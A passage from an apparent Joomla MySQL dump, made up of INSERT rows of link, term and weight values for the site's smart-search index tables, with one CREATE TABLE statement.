(242, 278228, 0.93331),
(242, 278229, 0.93331),
(242, 278230, 1.05),
(242, 278231, 1.02669),
(242, 278232, 1.02669),
(242, 278233, 0.93331),
(242, 278234, 0.98),
(242, 278235, 1.14331),
(242, 278236, 0.88669),
(242, 278237, 0.95669),
(242, 278238, 1.05),
(242, 278239, 1.12),
(242, 278240, 1.12),
(242, 278241, 0.98),
(242, 278242, 0.91),
(290, 278242, 0.91),
(242, 278243, 1.12),
(242, 278244, 0.86331),
(242, 278245, 1.00331),
(242, 278246, 0.93331),
(242, 278247, 0.95669),
(242, 278248, 1.02669),
(242, 278249, 0.93331),
(242, 278250, 0.95669),
(242, 278251, 0.95669),
(242, 278252, 0.98),
(306, 278252, 0.98),
(242, 278253, 0.95669),
(242, 278254, 1.02669),
(242, 278255, 0.91),
(242, 278256, 0.98),
(242, 278257, 0.91),
(242, 278258, 0.98),
(242, 278259, 0.98),
(242, 278260, 1.05),
(242, 278261, 0.95669),
(242, 278262, 1.05),
(242, 278263, 1.02669),
(242, 278264, 1.00331),
(242, 278265, 1.05),
(242, 278266, 0.88669),
(292, 278266, 0.88669),
(242, 278267, 0.98),
(288, 278268, 0.88669),
(242, 278268, 1.77338),
(242, 278269, 0.95669),
(242, 278270, 0.98),
(242, 278271, 0.91),
(242, 278272, 1.00331),
(242, 278273, 1.00331),
(242, 278274, 1.02669),
(242, 278275, 1.05),
(242, 278276, 2.14662),
(242, 278277, 1.05),
(242, 278278, 1.02669),
(242, 278279, 0.98),
(242, 278280, 1.05),
(242, 278281, 1.05),
(242, 278282, 1.16669),
(242, 278283, 0.95669),
(242, 278284, 1.02669),
(242, 278285, 0.23331),
(242, 278286, 1.02669),
(242, 278287, 1.09669),
(242, 278288, 0.88669),
(242, 278289, 0.98),
(242, 278290, 0.28),
(242, 278291, 1.05),
(242, 278292, 1.12),
(242, 278293, 0.28),
(242, 278294, 0.91),
(242, 278295, 1.00331),
(243, 281995, 0.93331),
(243, 281996, 1.05),
(243, 281997, 0.95669),
(243, 281998, 0.95669),
(243, 281999, 1.09669),
(243, 282000, 0.93331),
(243, 282001, 0.93331),
(243, 282002, 1.02669),
(243, 282003, 0.95669),
(243, 282004, 0.93331),
(243, 282005, 1.00331),
(243, 282006, 0.95669),
(243, 282007, 0.98),
(306, 282007, 0.98),
(243, 282008, 0.98),
(243, 282009, 1.02669),
(243, 282010, 1.07331),
(243, 282011, 0.91),
(243, 282012, 1.09669),
(243, 282013, 1.21331),
(243, 282014, 1.00331),
(243, 282015, 1.02669),
(243, 282016, 1.09669),
(243, 282017, 1.02669),
(243, 282018, 1.12),
(243, 282019, 1.00331),
(243, 282020, 0.95669),
(243, 282021, 1.00331),
(243, 282022, 0.93331),
(243, 282023, 1.05),
(243, 282024, 1.09669),
(243, 282025, 1.33),
(244, 283928, 0.86331),
(244, 283929, 0.98),
(244, 283930, 0.84),
(244, 283931, 0.95669),
(244, 283932, 0.93331),
(244, 283933, 1.02669),
(244, 283934, 0.98),
(244, 283935, 1.05),
(244, 283936, 0.93331),
(244, 283937, 1.09669),
(244, 283938, 0.91),
(290, 283938, 0.91),
(244, 283939, 1.00331),
(244, 283940, 1.00331),
(244, 283941, 0.95669),
(244, 283942, 0.88669),
(305, 283942, 0.88669),
(244, 283943, 1.02669),
(244, 283944, 0.91),
(244, 283945, 0.98),
(244, 283946, 0.88669),
(244, 283947, 0.98),
(244, 283948, 0.95669),
(244, 283949, 1.02669),
(244, 283950, 1.02669),
(244, 283951, 1.12),
(244, 283952, 0.93331),
(244, 283953, 1.02669),
(244, 283954, 0.86331),
(244, 283955, 0.95669),
(244, 283956, 0.88669),
(244, 283957, 1.00331),
(244, 283958, 3.91992),
(245, 284871, 0.95669),
(245, 284872, 1.14331),
(245, 284873, 1.07331),
(245, 284874, 0.98),
(245, 284875, 1.09669),
(245, 284876, 0.98),
(245, 284877, 1.05),
(246, 285507, 0.95669),
(246, 285508, 0.91),
(246, 285509, 1.16669),
(246, 285510, 0.98),
(246, 285511, 1.09669),
(246, 285512, 0.95669),
(246, 285513, 1.00331),
(246, 285514, 0.81669),
(246, 285515, 0.93331),
(246, 285516, 0.18669),
(246, 285517, 0.88669),
(246, 285518, 1.00331),
(246, 285519, 0.91),
(246, 285520, 0.98),
(246, 285521, 0.91),
(246, 285522, 0.95669),
(246, 285523, 0.95669),
(246, 285524, 0.93331),
(246, 285525, 1.02669),
(246, 285526, 1.14331),
(246, 285527, 0.32669),
(246, 285528, 1.09669),
(246, 285529, 1.26),
(247, 286528, 0.28),
(247, 286529, 0.93331),
(247, 286530, 0.98),
(247, 286531, 1.91338),
(247, 286532, 0.84),
(290, 286532, 1.68),
(247, 286533, 1.07331),
(247, 286534, 0.93331),
(247, 286535, 1.07331),
(247, 286536, 0.88669),
(247, 286537, 0.98),
(247, 286538, 1.12),
(247, 286539, 0.93331),
(247, 286540, 1.16669),
(247, 286541, 1.02669),
(247, 286542, 1.16669),
(247, 286543, 0.98),
(247, 286544, 1.14331),
(248, 287472, 1.00331),
(248, 287473, 1.07331),
(248, 287474, 0.86331),
(288, 287474, 0.86331),
(248, 287475, 0.93331),
(248, 287476, 0.88669),
(248, 287477, 1.05),
(248, 287478, 0.98),
(248, 287479, 1.00331),
(248, 287480, 1.07331),
(248, 287481, 1.05),
(248, 287482, 0.95669),
(248, 287483, 1.12),
(248, 287484, 1.05),
(248, 287485, 0.37331),
(248, 287486, 1.12),
(248, 287487, 1.19),
(249, 288527, 0.88669),
(249, 288528, 0.98),
(249, 288529, 0.86331),
(249, 288530, 1.09669),
(249, 288531, 0.86331),
(249, 288532, 0.95669),
(249, 288533, 0.32669),
(249, 288534, 0.98),
(249, 288535, 1.07331),
(249, 288536, 0.23331),
(288, 288536, 0.23331),
(298, 288536, 0.23331),
(304, 288536, 0.69993),
(249, 288537, 0.93331),
(249, 288538, 1.21331),
(249, 288539, 0.91),
(249, 288540, 1.00331),
(249, 288541, 0.81669),
(249, 288542, 0.98),
(249, 288543, 1.02669),
(249, 288544, 1.23669),
(249, 288545, 0.93331),
(249, 288546, 0.91),
(249, 288547, 1.00331),
(249, 288548, 1.02669),
(249, 288549, 0.98),
(249, 288550, 0.93331),
(249, 288551, 1.02669),
(249, 288552, 0.88669),
(306, 288552, 0.88669),
(249, 288553, 0.98),
(249, 288554, 0.95669),
(249, 288555, 1.02669),
(249, 288556, 0.98),
(249, 288557, 1.05),
(249, 288558, 0.98),
(249, 288559, 3.28008),
(249, 288560, 3.6),
(249, 288561, 1.05),
(249, 288562, 1.16669),
(249, 288563, 0.98),
(306, 288563, 0.98),
(249, 288564, 1.05),
(252, 289681, 0.95669),
(252, 289682, 1.05),
(252, 289683, 0.93331),
(252, 289684, 1.02669),
(252, 289685, 0.88669),
(252, 289686, 0.98),
(252, 289687, 0.86331),
(290, 289687, 0.86331),
(306, 289687, 0.86331),
(252, 289688, 1.07331),
(252, 289689, 1.00331),
(292, 289689, 2.00662),
(252, 289690, 0.98),
(252, 289691, 0.88669),
(252, 289692, 1.02669),
(252, 289693, 0.88669),
(252, 289694, 1.02669),
(252, 289695, 0.86331),
(252, 289696, 1.02669),
(252, 289697, 1.21331),
(252, 289698, 0.91),
(252, 289699, 1.00331),
(252, 289700, 1.00331),
(252, 289701, 0.91),
(252, 289702, 1.00331),
(253, 290735, 0.95669),
(253, 290736, 1.07331),
(253, 290737, 0.86331),
(253, 290738, 0.93331),
(253, 290739, 0.93331),
(253, 290740, 1.05),
(253, 290741, 1.21331),
(253, 290742, 0.95669),
(253, 290743, 1.00331),
(253, 290744, 1.16669),
(253, 290745, 0.93331),
(253, 290746, 1.19),
(253, 290747, 1.96),
(253, 290748, 1.23669),
(253, 290749, 1.09669),
(253, 290750, 0.95669),
(253, 290751, 1.02669),
(253, 290752, 0.93331),
(253, 290753, 1.02669),
(253, 290754, 0.98),
(253, 290755, 1.14331),
(253, 290756, 0.91),
(253, 290757, 0.95669),
(253, 290758, 0.93331),
(253, 290759, 1.07331),
(253, 290760, 0.95669),
(253, 290761, 1.05),
(254, 291926, 0.37331),
(254, 291927, 0.95669),
(254, 291928, 1.07331),
(254, 291929, 0.86331),
(254, 291930, 0.91),
(254, 291931, 0.93331),
(254, 291932, 1.07331),
(254, 291933, 1.82),
(254, 291934, 1.00331),
(254, 291935, 0.98),
(254, 291936, 1.19),
(254, 291937, 0.98),
(254, 291938, 1.00331),
(254, 291939, 1.00331),
(254, 291940, 0.95669),
(254, 291941, 1.00331),
(254, 291942, 0.93331),
(254, 291943, 1.12),
(254, 291944, 0.95669),
(254, 291945, 0.91),
(254, 291946, 1.00331),
(254, 291947, 1.05),
(254, 291948, 0.95669),
(254, 291949, 1.05),
(255, 292745, 0.98),
(255, 292746, 0.98),
(255, 292747, 1.16669),
(255, 292748, 0.95669),
(255, 292749, 1.09669),
(256, 293303, 0.91),
(256, 293304, 0.95669),
(256, 293305, 0.88669),
(256, 293306, 1.09669),
(256, 293307, 5.74014),
(256, 293308, 1.12),
(256, 293309, 1.02669),
(256, 293310, 2.19338),
(256, 293311, 1.05),
(256, 293312, 1.09669),
(256, 293313, 0.88669),
(256, 293314, 1.00331),
(256, 293315, 0.95669),
(256, 293316, 0.95669),
(256, 293317, 1.05),
(256, 293318, 0.98),
(256, 293319, 1.07331),
(256, 293320, 1.07331),
(256, 293321, 1.19),
(256, 293322, 1.12),
(256, 293323, 1.21331),
(256, 293324, 0.98),
(256, 293325, 1.07331),
(257, 294314, 0.93331),
(257, 294315, 0.86331),
(257, 294316, 1.05),
(257, 294317, 0.23331),
(288, 294317, 0.23331),
(257, 294318, 0.93331),
(257, 294319, 1.05),
(257, 294320, 0.98),
(257, 294321, 1.00331),
(257, 294322, 1.09669),
(257, 294323, 0.95669),
(257, 294324, 0.88669),
(257, 294325, 1.00331),
(257, 294326, 0.93331),
(257, 294327, 1.07331),
(257, 294328, 1.05),
(257, 294329, 1.09669),
(257, 294330, 1.02669),
(257, 294331, 0.65338),
(257, 294332, 0.95669),
(257, 294333, 1.05),
(257, 294334, 0.93331),
(257, 294335, 1.02669),
(257, 294336, 0.28),
(305, 294336, 1.12),
(257, 294337, 0.93331),
(305, 294337, 1.86662),
(257, 294338, 1.05),
(305, 294338, 2.1),
(258, 295308, 0.98),
(258, 295309, 1.09669),
(258, 295310, 0.88669),
(306, 295310, 0.88669),
(258, 295311, 0.98),
(258, 295312, 0.91),
(292, 295312, 1.82),
(258, 295313, 0.98),
(258, 295314, 1.00331),
(258, 295315, 1.12),
(258, 295316, 0.84),
(258, 295317, 0.95669),
(258, 295318, 1.07331),
(258, 295319, 2.87007),
(258, 295320, 1.07331),
(258, 295321, 1.09669),
(258, 295322, 1.05),
(258, 295323, 0.23331),
(258, 295324, 0.98),
(258, 295325, 1.09669),
(258, 295326, 1.02669),
(258, 295327, 1.19),
(258, 295328, 0.37331),
(258, 295329, 1.00331),
(258, 295330, 1.23669),
(261, 296490, 1.02669),
(261, 296491, 1.02669),
(261, 296492, 1.09669),
(261, 296493, 0.95669),
(261, 296494, 1.02669),
(261, 296495, 1.02669),
(261, 296496, 1.00331),
(261, 296497, 1.07331),
(261, 296498, 1.77338),
(261, 296499, 0.98),
(261, 296500, 1.00331),
(261, 296501, 1.09669),
(261, 296502, 1.07331),
(261, 296503, 1.19),
(261, 296504, 1.09669),
(261, 296505, 1.19),
(261, 296506, 0.91),
(261, 296507, 1.16669),
(261, 296508, 1.19),
(261, 296509, 0.93331),
(261, 296510, 1.00331),
(261, 296511, 2.14662),
(261, 296512, 0.93331),
(288, 296512, 0.93331),
(290, 296512, 0.93331),
(261, 296513, 1.96),
(261, 296514, 1.09669),
(261, 296515, 0.84),
(261, 296516, 2.14662),
(261, 296517, 1.14331),
(261, 296518, 1.23669),
(262, 297605, 2.24),
(262, 297606, 1.28331),
(262, 297607, 1.19),
(262, 297608, 0.93331),
(262, 297609, 1.00331),
(262, 297610, 0.98),
(262, 297611, 0.95669),
(262, 297612, 0.93331),
(262, 297613, 1.00331),
(262, 297614, 1.02669),
(262, 297615, 1.14331),
(262, 297616, 0.95669),
(262, 297617, 0.95669),
(262, 297618, 0.95669),
(262, 297619, 1.07331),
(262, 297620, 1.09669),
(262, 297621, 1.00331),
(262, 297622, 1.26),
(262, 297623, 1.12),
(262, 297624, 1.19),
(262, 297625, 1.05),
(262, 297626, 1.00331),
(262, 297627, 0.32669),
(262, 297628, 0.98),
(262, 297629, 1.14331),
(263, 299574, 0.56),
(306, 299574, 0.56),
(263, 299575, 1.19),
(263, 299576, 1.26),
(263, 299577, 1.02669),
(263, 299578, 1.14331),
(263, 299579, 0.86331),
(263, 299580, 0.93331),
(263, 299581, 1.00331),
(263, 299582, 1.07331),
(263, 299583, 1.05),
(263, 299584, 1.21331),
(263, 299585, 0.93331),
(263, 299586, 1.07331),
(263, 299587, 0.91),
(263, 299588, 0.95669),
(263, 299589, 1.19),
(263, 299590, 0.91),
(263, 299591, 0.98),
(263, 299592, 0.98),
(263, 299593, 1.07331),
(263, 299594, 1.05),
(263, 299595, 1.16669),
(263, 299596, 0.93331),
(263, 299597, 1.02669),
(263, 299598, 0.86331),
(263, 299599, 0.98),
(263, 299600, 1.05),
(263, 299601, 1.14331),
(263, 299602, 1.02669),
(263, 299603, 0.93331),
(263, 299604, 1.07331),
(263, 299605, 1.00331),
(264, 300496, 0.88669),
(264, 300497, 0.98),
(264, 300498, 0.93331),
(264, 300499, 1.05),
(264, 300500, 1.05),
(264, 300501, 1.82),
(264, 300502, 2.1),
(264, 300503, 0.81669),
(264, 300504, 0.91),
(264, 300505, 0.95669),
(264, 300506, 1.00331),
(264, 300507, 1.02669),
(264, 300508, 1.28331),
(264, 300509, 1.00331),
(267, 301089, 0.91),
(267, 301090, 1.02669),
(267, 301091, 0.88669),
(267, 301092, 0.86331),
(267, 301093, 0.95669),
(267, 301094, 0.95669),
(267, 301095, 0.88669),
(267, 301096, 1.00331),
(267, 301097, 0.95669),
(267, 301098, 0.98),
(267, 301099, 1.07331),
(267, 301100, 0.95669),
(267, 301101, 1.07331),
(267, 301102, 0.84),
(267, 301103, 1.00331),
(267, 301104, 0.93331),
(267, 301105, 1.05),
(267, 301106, 0.98),
(267, 301107, 0.98),
(267, 301108, 0.98),
(288, 301108, 0.98),
(306, 301108, 0.98),
(267, 301109, 0.93331),
(267, 301110, 1.05),
(267, 301111, 1.02669),
(267, 301112, 1.07331),
(268, 302126, 0.95669),
(268, 302127, 1.09669),
(268, 302128, 1.02669),
(268, 302129, 0.95669),
(268, 302130, 0.93331),
(268, 302131, 1.05),
(268, 302132, 0.98),
(268, 302133, 0.98),
(268, 302134, 1.07331),
(268, 302135, 0.93331),
(268, 302136, 1.02669),
(268, 302137, 1.00331),
(268, 302138, 0.86331),
(268, 302139, 1.00331),
(268, 302140, 0.84),
(268, 302141, 1.05),
(268, 302142, 0.91),
(268, 302143, 0.93331),
(268, 302144, 1.00331),
(268, 302145, 0.91),
(268, 302146, 0.98),
(269, 303106, 0.28),
(269, 303107, 0.93331),
(269, 303108, 1.02669),
(269, 303109, 0.23331),
(269, 303110, 0.91),
(269, 303111, 1.02669),
(269, 303112, 0.95669),
(269, 303113, 0.93331),
(269, 303114, 1.07331),
(269, 303115, 1.02669),
(269, 303116, 1.07331),
(269, 303117, 0.98),
(269, 303118, 1.02669),
(269, 303119, 1.05),
(269, 303120, 1.14331),
(269, 303121, 0.93331),
(269, 303122, 1.00331),
(269, 303123, 1.96),
(269, 303124, 0.86331),
(269, 303125, 1.05),
(269, 303126, 0.86331),
(269, 303127, 1.00331),
(269, 303128, 0.98),
(269, 303129, 1.02669),
(269, 303130, 1.05),
(269, 303131, 1.14331),
(269, 303132, 0.84),
(269, 303133, 0.93331),
(269, 303134, 0.93331),
(269, 303135, 1.02669),
(269, 303136, 0.95669),
(269, 303137, 1.05),
(272, 303953, 0.95669),
(272, 303954, 1.21331),
(274, 304209, 1.07331),
(274, 304210, 1.21331),
(274, 304211, 0.88669),
(274, 304212, 1.00331),
(274, 304213, 0.95669),
(274, 304214, 1.19),
(274, 304215, 1.02669),
(274, 304216, 0.86331),
(274, 304217, 0.95669),
(274, 304218, 0.98),
(274, 304219, 1.05),
(274, 304220, 0.98),
(274, 304221, 0.88669),
(274, 304222, 1.07331),
(274, 304223, 0.98),
(274, 304224, 1.00331),
(274, 304225, 0.98),
(275, 305160, 0.91),
(275, 305161, 1.02669),
(275, 305162, 0.98),
(275, 305163, 1.09669),
(275, 305164, 0.98),
(275, 305165, 0.93331),
(290, 305165, 0.93331),
(275, 305166, 1.12),
(275, 305167, 1.05),
(275, 305168, 0.95669),
(275, 305169, 0.93331),
(275, 305170, 1.02669),
(275, 305171, 1.02669),
(275, 305172, 0.88669),
(275, 305173, 0.98),
(275, 305174, 0.95669),
(275, 305175, 1.21331),
(275, 305176, 8.74688),
(275, 305177, 1.12),
(275, 305178, 1.23669),
(287, 312873, 1.02669),
(287, 312874, 1.07331),
(288, 313479, 1.02669),
(288, 313480, 1.09669),
(288, 313481, 0.84),
(288, 313482, 0.95669),
(288, 313483, 0.88669),
(288, 313484, 0.98),
(288, 313485, 0.88669),
(304, 313485, 0.88669),
(288, 313486, 0.98),
(304, 313486, 0.98),
(288, 313487, 0.93331),
(288, 313488, 1.12),
(288, 313489, 1.68),
(288, 313490, 1.91338),
(288, 313491, 0.91),
(288, 313492, 1.00331),
(288, 313493, 0.88669),
(288, 313494, 0.95669),
(288, 313495, 0.91),
(288, 313496, 1.00331),
(288, 313497, 0.93331),
(306, 313497, 0.93331),
(288, 313498, 1.00331),
(288, 313499, 2.15339),
(288, 313500, 2.38),
(288, 313501, 0.88669),
(288, 313502, 0.98),
(288, 313503, 0.95669),
(288, 313504, 0.93331),
(288, 313505, 1.00331),
(288, 313506, 1.07331),
(288, 313507, 0.84),
(288, 313508, 0.95669),
(288, 313509, 0.88669),
(288, 313510, 1.00331),
(288, 313511, 0.98),
(288, 313512, 1.02669),
(288, 313513, 0.91),
(288, 313514, 1.00331),
(288, 313515, 0.98),
(288, 313516, 1.02669),
(288, 313517, 0.91),
(288, 313518, 1.09669),
(288, 313519, 0.95669),
(288, 313520, 1.12),
(288, 313521, 1.05),
(288, 313522, 1.14331),
(288, 313523, 0.18669),
(288, 313524, 0.86331),
(288, 313525, 0.93331),
(288, 313526, 0.23331),
(288, 313527, 1.05),
(288, 313528, 1.12),
(290, 315471, 0.42),
(290, 315472, 1.00331),
(290, 315473, 1.14331),
(290, 315474, 0.91),
(290, 315475, 1.00331),
(290, 315476, 1.09669),
(290, 315477, 0.98),
(290, 315478, 1.14331),
(290, 315479, 0.95669),
(290, 315480, 1.05),
(290, 315481, 1.07331),
(290, 315482, 0.91),
(290, 315483, 0.84),
(290, 315484, 0.93331),
(290, 315485, 9.38688),
(290, 315486, 1.14331),
(290, 315487, 9.30981),
(290, 315488, 0.93331),
(290, 315489, 1.16669),
(290, 315490, 1.00331),
(290, 315491, 1.12),
(290, 315492, 0.98),
(290, 315493, 0.98),
(290, 315494, 1.02669),
(290, 315495, 1.09669),
(290, 315496, 0.95669),
(290, 315497, 1.02669),
(290, 315498, 0.88669),
(290, 315499, 0.95669),
(290, 315500, 0.95669),
(290, 315501, 1.00331),
(290, 315502, 0.98),
(290, 315503, 0.98),
(290, 315504, 0.98),
(290, 315505, 0.23331),
(290, 315506, 0.88669),
(290, 315507, 1.05),
(292, 317554, 0.32669),
(292, 317555, 0.98),
(292, 317556, 1.07331),
(292, 317557, 1.12),
(292, 317558, 0.93331),
(292, 317559, 1.02669),
(292, 317560, 0.86331),
(292, 317561, 0.98),
(292, 317562, 0.18669),
(292, 317563, 0.91),
(292, 317564, 0.95669),
(292, 317565, 0.88669),
(292, 317566, 0.95669),
(292, 317567, 0.98),
(292, 317568, 2.05338),
(292, 317569, 0.86331),
(292, 317570, 0.93331),
(292, 317571, 0.88669),
(292, 317572, 0.95669),
(292, 317573, 1.00331),
(292, 317574, 0.98),
(306, 317574, 0.98),
(292, 317575, 1.00331),
(292, 317576, 1.16669),
(292, 317577, 0.88669),
(306, 317577, 0.88669),
(292, 317578, 1.02669),
(306, 317578, 1.02669),
(292, 317579, 0.91),
(292, 317580, 1.07331),
(292, 317581, 0.88669),
(292, 317582, 1.02669),
(295, 318644, 0.32669),
(295, 318645, 1.02669),
(295, 318646, 1.28331),
(295, 318647, 1.00331),
(295, 318648, 1.07331),
(295, 318649, 0.42),
(295, 318650, 0.98),
(295, 318651, 1.09669),
(298, 320167, 1.09669),
(298, 320168, 1.26),
(298, 320169, 0.93331),
(306, 320169, 0.93331),
(308, 320169, 0.93331),
(298, 320170, 0.91),
(304, 320170, 1.82),
(298, 320171, 1.12),
(304, 320171, 1.12),
(298, 320172, 0.95669),
(308, 320172, 0.95669),
(298, 320173, 1.14331),
(308, 320173, 1.14331),
(298, 320174, 1.16669),
(308, 320174, 1.16669),
(298, 320175, 0.91),
(308, 320175, 0.91),
(298, 320176, 0.98),
(308, 320176, 0.98),
(298, 320177, 0.86331),
(308, 320177, 0.86331),
(298, 320178, 0.93331),
(308, 320178, 0.93331),
(298, 320179, 0.91),
(308, 320179, 0.91),
(298, 320180, 1.00331),
(308, 320180, 1.00331),
(298, 320181, 0.95669),
(308, 320181, 0.95669),
(298, 320182, 1.05),
(308, 320182, 1.05),
(298, 320183, 1.05),
(308, 320183, 1.05),
(298, 320184, 0.88669),
(308, 320184, 0.88669),
(298, 320185, 1.02669),
(308, 320185, 1.02669),
(298, 320186, 0.95669),
(308, 320186, 0.95669),
(299, 320912, 0.98),
(299, 320913, 1.02669),
(299, 320914, 3.84),
(299, 320915, 9.6),
(299, 320916, 0.93331),
(299, 320917, 1.00331),
(299, 320918, 1.00331),
(299, 320919, 0.91),
(299, 320920, 0.95669),
(299, 320921, 0.91),
(299, 320922, 1.05),
(299, 320923, 0.95669),
(299, 320924, 0.95669),
(299, 320925, 1.07331),
(299, 320926, 1.05),
(299, 320927, 0.88669),
(299, 320928, 0.93331),
(299, 320929, 0.93331),
(299, 320930, 1.00331),
(299, 320931, 1.05),
(299, 320932, 0.18669),
(299, 320933, 0.88669),
(299, 320934, 0.93331),
(299, 320935, 0.88669),
(299, 320936, 1.02669),
(299, 320937, 0.86331),
(299, 320938, 1.05),
(299, 320939, 0.91),
(299, 320940, 1.00331);
INSERT INTO `y57u5_finder_links_termsb` (`link_id`, `term_id`, `weight`) VALUES
(299, 320941, 0.95669),
(299, 320942, 1.02669),
(299, 320943, 0.98),
(299, 320944, 1.07331),
(299, 320945, 1.14331),
(299, 320946, 1.05),
(299, 320947, 0.95669),
(299, 320948, 1.07331),
(299, 320949, 0.93331),
(299, 320950, 1.19),
(304, 325027, 1.00331),
(304, 325028, 0.95669),
(304, 325029, 0.88669),
(304, 325030, 1.07331),
(304, 325031, 0.98),
(304, 325032, 1.02669),
(304, 325033, 0.81669),
(304, 325034, 0.93331),
(304, 325035, 0.91),
(304, 325036, 0.91),
(304, 325037, 0.98),
(304, 325038, 1.07331),
(304, 325039, 1.07331),
(304, 325040, 0.95669),
(304, 325041, 0.86331),
(304, 325042, 0.95669),
(304, 325043, 0.93331),
(304, 325044, 1.05),
(304, 325045, 0.93331),
(304, 325046, 1.21331),
(304, 325047, 0.42),
(304, 325048, 1.02669),
(304, 325049, 1.12),
(304, 325050, 0.42),
(304, 325051, 1.00331),
(304, 325052, 1.07331),
(304, 325053, 0.32669),
(304, 325054, 0.95669),
(304, 325055, 1.07331),
(305, 326128, 0.81669),
(305, 326129, 0.86331),
(305, 326130, 1.07331),
(305, 326131, 0.88669),
(305, 326132, 1.00331),
(305, 326133, 1.77338),
(305, 326134, 0.95669),
(305, 326135, 1.00331),
(305, 326136, 1.00331),
(305, 326137, 0.95669),
(305, 326138, 1.02669),
(305, 326139, 0.65338),
(305, 326140, 0.93331),
(305, 326141, 1.02669),
(305, 326142, 0.93331),
(305, 326143, 1.07331),
(305, 326144, 0.93331),
(305, 326145, 1.16669),
(305, 326146, 0.93331),
(305, 326147, 1.02669),
(305, 326148, 0.98),
(305, 326149, 1.02669),
(305, 326150, 1.21331),
(306, 327403, 0.88669),
(306, 327404, 0.98),
(306, 327405, 1.28331),
(306, 327406, 1.37669),
(306, 327407, 0.91),
(306, 327408, 0.98),
(306, 327409, 0.18669),
(306, 327410, 0.86331),
(306, 327411, 0.95669),
(306, 327412, 0.88669),
(306, 327413, 1.07331),
(306, 327414, 0.86331),
(306, 327415, 0.91),
(306, 327416, 1.00331),
(306, 327417, 0.93331),
(306, 327418, 1.02669),
(306, 327419, 0.86331),
(306, 327420, 0.98),
(306, 327421, 2.79993),
(306, 327422, 1.00331),
(306, 327423, 2.05338),
(306, 327424, 1.02669),
(306, 327425, 1.02669),
(306, 327426, 1.82),
(306, 327427, 1.00331),
(306, 327428, 1.00331),
(306, 327429, 0.98),
(306, 327430, 0.93331),
(306, 327431, 1.05),
(306, 327432, 0.93331),
(306, 327433, 0.93331),
(306, 327434, 1.09669),
(306, 327435, 0.91),
(306, 327436, 1.05),
(306, 327437, 1.05),
(306, 327438, 1.00331),
(306, 327439, 0.95669),
(306, 327440, 1.07331),
(306, 327441, 0.95669),
(306, 327442, 1.05),
(306, 327443, 0.93331),
(306, 327444, 1.02669),
(306, 327445, 0.88669),
(306, 327446, 0.93331),
(306, 327447, 0.98),
(306, 327448, 1.00331),
(306, 327449, 1.02669),
(306, 327450, 1.07331),
(306, 327451, 1.00331),
(306, 327452, 1.02669),
(306, 327453, 1.05),
(306, 327454, 0.93331),
(306, 327455, 0.98),
(306, 327456, 1.00331),
(306, 327457, 0.98),
(306, 327458, 0.81669),
(306, 327459, 1.07331),
(306, 327460, 0.37331),
(306, 327461, 0.93331),
(306, 327462, 1.16669),
(306, 327463, 0.93331),
(306, 327464, 0.91),
(306, 327465, 1.12),
(306, 327466, 0.28),
(306, 327467, 0.95669),
(306, 327468, 1.09669),
(308, 328930, 1.07331),
(308, 328931, 1.23669),
(308, 328932, 0.88669),
(308, 328933, 1.07331);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_links_termsc`
--

CREATE TABLE `y57u5_finder_links_termsc` (
  `link_id` int(10) UNSIGNED NOT NULL,
  `term_id` int(10) UNSIGNED NOT NULL,
  `weight` float UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_links_termsc`
--

INSERT INTO `y57u5_finder_links_termsc` (`link_id`, `term_id`, `weight`) VALUES
(193, 1024, 0.07),
(237, 1024, 0.07),
(242, 1024, 0.07),
(243, 1024, 0.07),
(248, 1024, 0.07),
(262, 1024, 0.07),
(263, 1024, 0.07),
(269, 1024, 0.07),
(270, 1024, 0.07),
(274, 1024, 0.07),
(287, 1024, 0.07),
(288, 1024, 0.07),
(301, 1024, 0.07),
(174, 1024, 0.14),
(233, 1024, 0.14),
(244, 1024, 0.14),
(246, 1024, 0.14),
(255, 1024, 0.14),
(267, 1024, 0.14),
(273, 1024, 0.14),
(304, 1024, 0.14),
(305, 1024, 0.14),
(264, 1024, 0.21),
(299, 1024, 0.21),
(239, 1024, 0.24),
(249, 1024, 0.24),
(238, 1024, 0.28),
(247, 1024, 0.35),
(160, 1024, 0.36),
(168, 1024, 0.42),
(235, 1024, 0.42),
(178, 1024, 0.49),
(159, 1024, 0.73),
(236, 1024, 0.77),
(159, 1027, 1.47996),
(160, 1027, 1.47996),
(159, 1028, 1.56),
(160, 1028, 1.56),
(233, 1182, 0.14),
(235, 1182, 0.14),
(236, 1182, 0.14),
(239, 1182, 0.14),
(240, 1182, 0.14),
(242, 1182, 0.14),
(244, 1182, 0.14),
(247, 1182, 0.14),
(258, 1182, 0.14),
(265, 1182, 0.14),
(266, 1182, 0.14),
(267, 1182, 0.14),
(275, 1182, 0.14),
(287, 1182, 0.14),
(299, 1182, 0.14),
(305, 1182, 0.14),
(161, 1182, 0.28),
(193, 1182, 0.28),
(238, 1182, 0.28),
(290, 1182, 0.28),
(304, 1182, 0.28),
(48, 1182, 0.4),
(298, 1182, 0.74),
(161, 1202, 0.07),
(233, 1202, 0.07),
(235, 1202, 0.07),
(236, 1202, 0.07),
(239, 1202, 0.07),
(242, 1202, 0.07),
(243, 1202, 0.07),
(244, 1202, 0.07),
(247, 1202, 0.07),
(253, 1202, 0.07),
(258, 1202, 0.07),
(287, 1202, 0.07),
(292, 1202, 0.07),
(304, 1202, 0.07),
(305, 1202, 0.07),
(193, 1202, 0.14),
(238, 1202, 0.14),
(263, 1202, 0.14),
(46, 1202, 0.2),
(178, 1202, 0.21),
(246, 1202, 0.21),
(299, 1202, 0.37),
(193, 11570, 0.07),
(237, 11570, 0.07),
(239, 11570, 0.07),
(253, 11570, 0.07),
(255, 11570, 0.07),
(262, 11570, 0.07),
(269, 11570, 0.07),
(270, 11570, 0.07),
(287, 11570, 0.07),
(299, 11570, 0.07),
(301, 11570, 0.07),
(305, 11570, 0.07),
(168, 11570, 0.14),
(174, 11570, 0.14),
(178, 11570, 0.14),
(248, 11570, 0.14),
(249, 11570, 0.14),
(263, 11570, 0.14),
(267, 11570, 0.14),
(304, 11570, 0.14),
(243, 11570, 0.21),
(273, 11570, 0.21),
(240, 11570, 0.24),
(233, 11570, 0.28),
(238, 11570, 0.28),
(246, 11570, 0.28),
(264, 11570, 0.28),
(160, 11570, 0.37),
(247, 11570, 0.42),
(306, 11570, 0.57),
(236, 11570, 0.84),
(241, 15694, 0.14),
(249, 15694, 0.14),
(263, 15694, 0.14),
(299, 15694, 0.14),
(233, 15694, 0.28),
(238, 15694, 0.28),
(244, 15694, 0.28),
(264, 15694, 0.28),
(305, 15694, 0.34),
(239, 15694, 0.74),
(258, 15694, 1.14),
